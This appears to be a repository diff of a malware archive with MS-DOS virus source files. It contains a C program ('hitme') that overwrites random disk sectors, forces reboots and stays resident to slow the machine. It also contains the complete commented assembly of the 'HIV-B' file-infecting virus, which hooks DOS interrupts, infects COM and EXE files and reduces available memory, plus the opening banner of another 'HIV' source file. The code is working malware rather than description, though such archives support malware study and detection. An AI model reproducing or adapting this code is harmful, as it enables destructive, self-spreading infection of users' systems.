db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt:
size equ $-100h
pgf equ ($+16)/16


42
MSDOS/Virus.MSDOS.Unknown.hitme.asm Normal file
View File

@ -0,0 +1,42 @@
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <conio.h>
#include <dir.h>
#include <dos.h>
#define INTR 0X1C
#ifdef __cplusplus
#define __CPPARGS ...
#else
#define __CPPARGS
#endif
void interrupt ( *oldhandler)(__CPPARGS);
void interrupt handler(__CPPARGS)
{
delay(135);
oldhandler();
}
void main(void)
{
randomize(); char buf[512];
abswrite(2, 1, random(50000)+2000, buf);
if(random(20) == 10) asm INT 19h
oldhandler = getvect(INTR);
setvect(INTR, handler);
_ES = _psp; //PSP address
asm MOV es,es:[2ch]
_AH = 0x49; //Function 49 (remove memory block)
asm INT 21h //Call DOS to execute instruction
_AH = 0x31; //Function 31 (tsr)
_AL = 0x00; //Exit code
_DX = _psp; //PSP address
asm INT 21h //Call DOS to execute instruction
}

745
MSDOS/Virus.MSDOS.Unknown.hiv-b.asm Normal file
View File

@ -0,0 +1,745 @@
DATA_1E EQU 4CH ; Just a Few Data Segments that are
DATA_3E EQU 84H ; Needed for the virus to find some
DATA_5E EQU 90H ; hard core info...
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h
HIV PROC FAR
START:
JMP LOC_35
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0
DATA_25 DW 0
DATA_26 DW 0
DATA_27 DW 706AH
DATA_28 DD 00000H
DATA_29 DW 0
DATA_30 DW 706AH
DATA_31 DD 00000H
DATA_32 DW 0
DATA_33 DW 706AH
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13
LOC_2:
PUSH ES ; Save All Regesters so that when
PUSH DS ; we restore the program it will
PUSH DI ; RUN correctly and hide the fact
PUSH SI ; that any Virii is tampering with
PUSH BP ; the System....
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6
CALL SUB_7
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI
LOC_3:
MOV CX,80H
MOV SI,DX
LOCLOOP_4:
INC SI ; Slowly down the System a
MOV AL,[SI] ; little.
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2
CMP WORD PTR [SI],4D4FH
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ;
DB 90H
LOC_6:
CMP WORD PTR [SI-2],452EH
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H
CALL SUB_5
JC LOC_12 ; Jump if carry Set
MOV BX,AX
MOV AX,5700H
CALL SUB_5 ; Initsilize the virus...
MOV CS:DATA_24,CX ; A Basic Start up to check
MOV CS:DATA_25,DX ; The Interrup 21h
MOV AX,4200H
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS
MOV DX,103H
MOV SI,DX
MOV CX,18H
MOV AH,3FH
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH
JNE LOC_9 ; Jump if not equal
CALL SUB_1
JMP SHORT LOC_10
LOC_9:
CALL SUB_4
LOC_10:
JC LOC_11 ; Jump if carry Set
MOV AX,5701H
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; '>'
CALL SUB_5
LOC_12:
CALL SUB_7
POP AX ; A Stealth Procedure to
POP BX ; end the virus and restore
POP CX ; the program! Pup back all
POP DX ; regesters as we found them!
POP BP ; so nothings changed...
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28
DB 0B4H, 2AH, 0CDH, 21H, 0C3H
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],0
JE LOC_RET_19 ; Jump if equal
CMP DX,0
JNE LOC_17 ; Jump if not equal
CMP AX,64EH
JNE LOC_17 ; Jump if not equal
STC ; Set carry flag
RETN
LOC_17:
MOV DX,BP
MOV AX,DI
PUSH DX
PUSH AX
ADD AX,64EH
ADC DX,0
MOV CX,200H
DIV CX ; Find out How much System
LES DI,DWORD PTR [SI+2] ; memory is available...
MOV CS:DATA_26,DI ;
MOV CS:DATA_27,ES ; Every so often make the
MOV [SI+2],DX ; system memory small than
CMP DX,0 ; what it already is...
JE LOC_18 ; Screws up the users hehe
INC AX
LOC_18:
MOV [SI+4],AX
POP AX
POP DX
CALL SUB_2
SUB AX,[SI+8]
LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_2 PROC NEAR
MOV CX,4
MOV DI,AX
AND DI,0FH
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill
RCR AX,1 ; Rotate thru carry
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_3 PROC NEAR
MOV AH,40H
MOV CX,64EH
MOV DX,100H
CALL SUB_6
JMP SHORT LOC_24
DB 90H
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_4:
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =
PUSH AX
CMP BYTE PTR [SI],0E9H
JNE LOC_21 ; Jump if not equal
SUB AX,651H
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag
RETN
LOC_21:
CALL SUB_3
JNC LOC_22 ; Jump if carry=0
POP AX
RETN
LOC_22:
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX
SUB AX,3
MOV DX,122H
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H
MOV CS:[SI+1],AX
MOV AH,40H
MOV CX,3
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags
CALL CS:DATA_28
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
MOV CS:DATA_29,AX ; to the COM File...
MOV CS:DATA_30,ES
MOV AX,46AH
MOV DS:DATA_5E,AX
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
MOV CS:DATA_32,AX ; get your info needed on
MOV CS:DATA_33,ES ; System...
LES AX,CS:DATA_31
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore regesters!
POP DS ; go back to the file
POP AX ; being executed...
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
MOV DS:DATA_5E,AX ; yourself to the EXE
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
DB 0B0H, 3, 0CFH, 50H, 53H, 51H
DB 52H, 56H, 57H, 55H, 1EH, 6
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH
DB 62H, 4, 0A1H, 50H, 4, 2EH
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
DB 4, 0A3H, 50H, 4, 2EH, 0A1H
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H
DB 34H, 0, 0E8H, 0B7H, 0, 2EH
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4
DB 0B3H, 2, 0B8H, 2, 9, 0B9H
DB 1, 0, 0CDH, 10H, 2EH, 0A1H
DB 0CEH, 4, 0A3H, 50H, 4, 7
DB 1FH
DB ']_^ZY[X.'
DB 0FFH, 2EH, 0CAH, 4
DATA_36 DW 0
DATA_37 DW 1010H
DATA_39 DB 0
DATA_40 DD 706A0000H
DB 0, 0, 2EH, 0A1H, 0C7H, 4
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH
DB 0F6H, 6, 0C9H, 4, 1, 74H
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH
DB 80H, 36H, 0C9H, 4, 1, 0EBH
DB 0AH
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if >
XOR CS:DATA_39,1
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero
CMP AH,18H
JB LOC_28 ; Jump if below
XOR CS:DATA_39,2
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if >
XOR CS:DATA_39,2
LOC_28:
CMP BYTE PTR CS:DATA_36,20H
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; Get info on type of Video
MOV BH,DS:DATA_13E ; Display the system has...
MOV AH,8
INT 10H ; with ah=functn 08h
; basically fuck the cursur..
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP
DB 50H, 53H, 51H, 52H, 56H, 57H
DB 55H, 1EH, 6, 33H, 0C0H, 50H
DB 1FH, 81H, 3EH, 70H, 0, 6DH
DB 4, 74H, 35H, 0A1H, 6CH, 4
DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH
DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0
DB 75H, 24H, 0FAH, 8BH, 2EH, 50H
DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH
DB 50H, 4, 0C4H, 6, 70H, 0
DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH
DB 6, 0CCH, 4, 0C7H, 6, 70H
DB 0, 6DH, 4, 8CH, 0EH, 72H
DB 0, 0FBH
LOC_34:
POP ES
POP DS ; Restore and get lost...
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_9 PROC NEAR
MOV DX,10H
MUL DX ; dx:ax = reg * ax
RETN
SUB_9 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_10 PROC NEAR
XOR AX,AX ; If if wants to dissamble
XOR BX,BX ; us give him a HARD time...
XOR CX,CX ; By making all into 0
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
XOR DI,DI ; Zero register
XOR BP,BP ; Zero register
RETN
SUB_10 ENDP
LOC_35:
PUSH DS
CALL SUB_11
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_11 PROC NEAR
MOV AX,4B4DH
INT 21H ; Load and EXEC file...
; be runned...
NOP
JC LOC_36 ; Jump if carry Set
JMP LOC_46
LOC_36:
POP SI
PUSH SI
MOV DI,SI
XOR AX,AX ; Zero register
PUSH AX
POP DS
LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr
MOV CS:DATA_49E[SI],AX ; Move lots of data
MOV CS:DATA_50E[SI],ES ; into CS to infect the file
LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit..
MOV CS:DATA_47E[DI],BX
MOV CS:DATA_48E[DI],ES
MOV AX,DS:DATA_7E
CMP AX,0F000H
JNE LOC_44 ; Jump if not equal
MOV DL,80H
MOV AX,DS:DATA_8E
CMP AX,0F000H
JE LOC_37 ; Jump if equal
CMP AH,0C8H
JB LOC_44 ; Jump if below
CMP AH,0F4H
JAE LOC_44 ; Jump if above or =
TEST AL,7FH
JNZ LOC_44 ; Jump if not zero
MOV DS,AX
CMP WORD PTR DS:DATA_51E,0AA55H
JNE LOC_44 ; Jump if not equal
MOV DL,DS:DATA_52E
LOC_37:
MOV DS,AX
XOR DH,DH ; Zero register
MOV CL,9
SHL DX,CL ; Shift w/zeros fill
MOV CX,DX
XOR SI,SI ; Zero register
LOCLOOP_38:
LODSW ; String [si] to ax
CMP AX,0FA80H
JNE LOC_39 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7380H
JE LOC_40 ; Jump if equal
JNZ LOC_41 ; Jump if not zero
LOC_39:
CMP AX,0C2F6H
JNE LOC_42 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7580H
JNE LOC_41 ; Jump if not equal
LOC_40:
INC SI
LODSW ; String [si] to ax
CMP AX,40CDH
JE LOC_43 ; Jump if equal
SUB SI,3
LOC_41:
DEC SI
DEC SI
LOC_42:
DEC SI
LOOP LOCLOOP_38 ; Loop if cx > 0
JMP SHORT LOC_44
LOC_43:
SUB SI,7
MOV CS:DATA_49E[DI],SI
MOV CS:DATA_50E[DI],DS
LOC_44:
MOV AH,62H
INT 21H ; Simple...Get the PSP
; Address (Program segment
MOV ES,BX ; address and but in BX)
MOV AH,49H
INT 21H ; Get the Free memory from
; the system
MOV BX,0FFFFH ; release extra memory blocks
MOV AH,48H
INT 21H ; Allocate the memory
; At BX (# bytes)
SUB BX,66H ; it attaches virus right
NOP ; under the 640k
JC LOC_46
MOV CX,ES ; did it work? If not just
STC ; end the virus...
ADC CX,BX
MOV AH,4AH
INT 21H ; Adjust teh memory block
; size! BX has the # of bytes
MOV BX,65H
STC ; Set carry flag
SBB ES:DATA_17E,BX ; Where to attach itself!
PUSH ES ; under 640K
MOV ES,CX
MOV AH,4AH
INT 21H ; Just change the memory
; allocations! (BX=Btyes Size)
MOV AX,ES
DEC AX
MOV DS,AX
MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k
CALL SUB_9
MOV BX,AX
MOV CX,DX
POP DS
MOV AX,DS
CALL SUB_9
ADD AX,DS:DATA_18E
ADC DX,0
SUB AX,BX
SBB DX,CX
JC LOC_45 ; Jump if carry Set
SUB DS:DATA_18E,AX
LOC_45:
MOV SI,DI
XOR DI,DI ; Zero register
PUSH CS
POP DS
SUB SI,4D7H
MOV CX,64EH
INC CX
REP MOVSB ; Rep when cx >0 Mov [si] to
MOV AH,62H ; es:[di]
INT 21H ; Get the Program segment
; prefix...so we can infect it
DEC BX
MOV DS,BX
MOV BYTE PTR DS:DATA_15E,5AH
MOV DX,1E4H
XOR AX,AX ; Zero register
PUSH AX
POP DS
MOV AX,ES
SUB AX,10H
MOV ES,AX
CLI ; Disable interrupts
MOV DS:DATA_3E,DX ;
MOV WORD PTR DS:DATA_3E+2,ES
STI ; Enable interrupts
DEC BYTE PTR DS:DATA_14E ;
LOC_46:
POP SI
CMP WORD PTR CS:DATA_42E[SI],5A4DH
JNE LOC_47 ; Jump if not equal
POP DS
MOV AX,CS:DATA_46E[SI]
MOV BX,CS:DATA_45E[SI] ; all this shit is to restore
PUSH CS ; the program and continue
POP CX ; running the original
SUB CX,AX ; program...
ADD CX,BX
PUSH CX
PUSH WORD PTR CS:DATA_44E[SI]
PUSH DS
POP ES
CALL SUB_10
RETF
LOC_47:
POP AX
MOV AX,CS:DATA_42E[SI]
MOV WORD PTR CS:[100H],AX
MOV AX,CS:DATA_43E[SI]
MOV WORD PTR CS:[102H],AX
MOV AX,100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL SUB_10
RETN
SUB_11 ENDP
SEG_A ENDS
END START

843
MSDOS/Virus.MSDOS.Unknown.hiv.asm Normal file
View File

@ -0,0 +1,843 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> HIV Virus Source :
HIV - VIRUS
Created: March 1991
Scan ID: [Murphy]
Origin: Italy ,"Italain Virus Laboratory!"
Sources: Produced by Rock Steady [NukE]
[NukE] Notes: Okay, another VIRUS SOURCE Release from [NukE]! Yup,
